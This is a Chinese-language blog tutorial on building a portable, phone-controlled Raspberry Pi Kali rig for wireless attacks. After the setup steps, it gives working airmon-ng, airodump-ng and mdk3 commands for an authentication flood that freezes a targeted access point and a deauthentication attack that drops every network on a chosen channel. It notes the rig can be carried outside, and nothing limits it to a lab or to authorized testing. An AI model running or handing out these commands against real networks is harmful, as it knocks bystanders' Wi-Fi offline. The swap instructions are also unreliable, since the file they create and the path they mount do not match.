手機利用樹莓派進行無線攻擊


內存卡8G以上

樹莓派3B+/4B

鏡像下載

https://www.offensive-security.com/kali-linux-arm-images/ 中,找到RaspberryPi Foundation

 

 

 

 

工具:Win32DiskImager

 

 

寫入,然后等待

 

 

之后會彈出讓你格式化,點取消不用管!

 

准備有快屏幕,一條HDMI線,鼠標 鍵盤

進系統配置

 

系統初始賬戶root 密碼 toor

 

 

 

 

 進入桌面使用默認設置

修改國內源

leafpad /etc/apt/sources.list

試了幾個源,國內個人覺得阿里雲比較快

#阿里雲
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

換完源,更新

apt-get update

 

設置開機自動連接某個熱點

目的為了樹莓派開機自動連上手機,

在根目錄放置一個文件名為wpa_supplicant.conf的文件,內容如下:

country=GB

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

update_config=1

network={

ssid=""   //你的Wifi名稱,注意大小寫

psk=""  //你的Wifi密碼

}

把SD卡插回樹莓派,開機。

實際上樹莓派的第一無線只連上過一個wifi,下次也只連上這個wifi

 

 

配置靜態IP (知道什么IP方便SSH鏈接)

 

 

vi /etc/dhcpcd.conf

 

# 使用 vi 編輯文件,增加下列配置項

 

 

# 指定接口 eth0 或者wlan0

 

interface wlan0

 

# 指定靜態IP,/24表示子網掩碼為 255.255.255.0

 

static ip_address=192.168.1.20/24

 

# 路由器/網關IP地址

 

static routers=192.168.1.1

 

# 手動自定義DNS服務器

 

static domain_name_servers=114.114.114.114

 

按Esc :wq     保存退出

 

 

 

 

配置虛擬內存  (可設 可不設,因為樹莓派3B+ RAM是1G,運行metasploit可能會出現內存不足導致的錯誤)

free -m 查看內存容量

 

創建虛擬內存交換文件

 dd  if=/dev/zero  of=/home/swap  bs=1024  count=2048k

對交換文件格式化並轉換為swap分區:

mkswap /home/swap

掛載並激活分區:

swapon /home/swap

執行以上命令可能會出現:“不安全的權限 0644,建議使用 0600”類似提示,不要緊張,實際上已經激活了,可以忽略提示,也可以聽從系統的建議修改下權限:

chmod -R 0600 /home/swap

這時候可以用 free -h 或 swapon -s命令查看新swap分區是否正常添加並激活使用。

修改 fstab 配置,設置開機自動掛載該分區:

 vim    /etc/fstab

在fstab文件末尾追加如下內容后:wq!保存即可:

/var/swapfile   swap  swap  defaults  0  0

直接對fstab進行echo追加:

echo  "/var/swapfile   swap  swap  defaults  0  0" >>  /etc/fstab

 

嘗試一次無線攻擊,使用KALI自帶的MDK3

 

這里需要准備第二網卡,因為第一網卡用來連接SSH,攻擊需要設置監聽,第一網卡設置監聽SSH會斷,第二網卡最好用LINUX免驅 省事

手機下載Juice SSH來連接樹莓派,需要圖形界面就下載VNC Viewer

 

第二網卡一般默認叫wlan1,第一網卡則是wlan0,具體可以用 ifconfig 命令查看

 

啟動網卡監聽模式

airmon-ng start wlan1

掃描附近wifi

airodump-ng wlan1mon

 

驗證洪水攻擊 / Authentication Flood Attack

-a 后面的參數為AP的熱點MAC:

mdk3 wlan1mon a -a 92:F0:52:02:B0:7A

這條命令會循環發送大量驗證信息給AP,過不了幾分鍾,AP就會卡死, 如果路由器有防DOS的功能的話,這個不好用

 

攻擊指定的頻道, 讓頻道為 11 的路由掉線,注意自己的頻道,別把自己打了

mdk3 wlan1mon d -c 11

 

在本地創建whitelist.txt白名單,里面寫上不被攻擊的MAC地址,那么這個地址就不會被攻擊

mdk3 wlan1mon d -c 11 -w "whitelist.txt"

 

 

 

 

 

 

 使用移動電源進行樹莓派供電,可以外帶出門

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM